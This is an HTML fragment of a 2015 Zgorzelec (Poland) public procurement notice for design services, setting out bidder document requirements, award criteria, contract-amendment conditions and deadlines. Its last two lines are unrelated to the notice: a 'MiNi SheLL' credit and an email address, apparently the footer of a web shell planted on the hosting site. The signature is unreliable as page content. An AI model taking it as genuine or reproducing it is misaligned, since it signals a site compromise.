<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi dołączyć następujące dokumenty:

1)	wypełniony formularz ofertowy - Formularz Nr 1 do SIWZ,     

2)	 pisemne zobowiązanie, o którym mowa w pkt. 9 ppkt. 2) SIWZ oraz dokumenty,                           o których mowa w pkt. 9 ppkt. 3) SIWZ, o ile Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych,


3)	Pełnomocnictwo do podpisania oferty i jej załączników, zgodnie z zapisami pkt. 8 SIWZ,                             o ile prawo do podpisywania oferty nie wynika z innych dokumentów złożonych wraz                 z ofertą,

4)	wypełniony formularz oświadczenia dot. podwykonawstwa - Formularz Nr  5 do SIWZ. 
W przypadku nie dołączenia do oferty powyższego formularza, bądź jego nie wypełnienia, Zamawiający uzna, że Wykonawca wykona zamówienie własnymi siłami.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin złożenia koncepcji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość  dokonania  zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonał wyboru Wykonawcy. Zakres zmian został przewidziany w niniejszym paragrafie.

2.	Zmiana terminu realizacji przedmiotu niniejszej umowy, w razie wystąpienia poniższych okoliczności:
1)	pomimo wystąpienia przez Wykonawcę z właściwie przygotowanym wnioskiem o wydanie decyzji administracyjnych, warunków technicznych lub innego dokumentu niezbędnego do prawidłowej realizacji przedmiotu umowy, w terminie przewidzianym w odrębnych przepisach, organ administracji publicznej lub inna instytucja nie wyda stosownego dokumentu. W takim przypadku termin wykonania przedmiotu umowy zostanie przesunięty o ilość dni zwłoki w wydaniu stosownego dokumentu;
2)	zmian prawa lub obowiązujących norm wywołujących konieczność zmiany zakresu przedmiotu niniejszej umowy,
3)	wystąpienia opóźnień zawinionych przez Zamawiającego, jeżeli takie opóźnienie ma lub będzie miało wpływ na termin realizacji przedmiotu niniejszej umowy,
4)	wystąpienia uzasadnionych zmian w uzgodnionych wcześniej rozwiązaniach projektowych niezbędnych do prawidłowego zakończenia realizacji zamówienia, których nie można było przewidzieć w momencie zawarcia umowy,
5)	zaistnienia przyczyn niezależnych od działania stron umowy, których przy zachowaniu wszelkich należnych środków nie można uniknąć ani im zapobiec, w szczególności protesty mieszkańców, innych osób prawnych lub fizycznych. W takiej sytuacji termin wykonania przedmiotu umowy zostanie przesunięty o uzasadnioną okolicznościami ilość dni ustaloną przez Strony umowy;
6)	wystąpienia opóźnień wynikających z wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;
7)	wystąpienia opóźnień w uzyskaniu przez Wykonawcę wymaganych warunków, opinii                      i uzgodnień, z przyczyn od niego niezależnych.

3.	Zmiana projektantów przedstawionych w ofercie - Wykonawca może dokonywać zmiany tych osób jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowe osoby na następujących warunkach:
1)	Wykonawca proponuje zmianę ww. osób w szczególności w razie: śmierci, choroby lub zdarzeń losowych, niewywiązywania się z obowiązków wynikających z umowy, rezygnacji tych osób.
2)	Zamawiający może żądać od Wykonawcy zmiany ww. osób, jeżeli uzna, że nie wykonują one należycie swoich obowiązków wynikających z umowy.
 Wykonawca obowiązany jest zmienić ww. osoby zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego.
3)	W przypadku zmiany ww. osób, nowe osoby powołane do pełnienia ww. obowiązków muszą spełniać wymagania określone w specyfikacji istotnych warunków zamówienia dla pełnienia danej funkcji.

4.	Zmianę umowy w zakresie podwykonawstwa, na każdym etapie realizacji zamówienia, przy uwzględnieniu zapisów dot. podwykonawstwa, o których mowa w niniejszej umowie.  

5.	Zmiana umowy w zakresie podwykonawstwa możliwa będzie w przypadku:
1)	wskazania innych podwykonawców, 
2)	rezygnacji podwykonawcy,  
3)	wskazania innego zakresu podwykonawstwa albo wykonanie części zamówienia przy pomocy podwykonawców, pomimo niewskazania w ofercie żadnej części zamówienia do powierzenia podwykonawcom. 

6.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je  w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.

7.	Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą ze stron umowy, w terminie 7 dni od dnia wystąpienia przesłanki do wprowadzenia takiej zmiany. 

8.	W przypadku, o którym mowa w ust. 2 pkt. 1 niniejszego paragrafu, Wykonawca zobowiązany będzie dostarczyć dowody potwierdzające powstałe okoliczności. 

9.	Uzgodnienie warunków zmiany umowy nastąpi poprzez sporządzenie i podpisanie przez przedstawicieli stron protokołu, określającego nowy termin wykonania dokumentacji projektowej, o której mowa w § 1 niniejszej umowy wraz z uzasadnieniem opisującym podstawy konieczności i celowości zmiany terminu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Zgorzelcu
59-900 Zgorzelec, ul. Domańskiego 7, Wydział Zamówień Publicznych - III piętro, pok. 304. SIWZ udostępniona będzie bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2015 godzina 10:00, miejsce: Punkt Obsługi Interesanta
Urząd Miasta w Zgorzelcu, 59-900 Zgorzelec, ul. Domańskiego 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com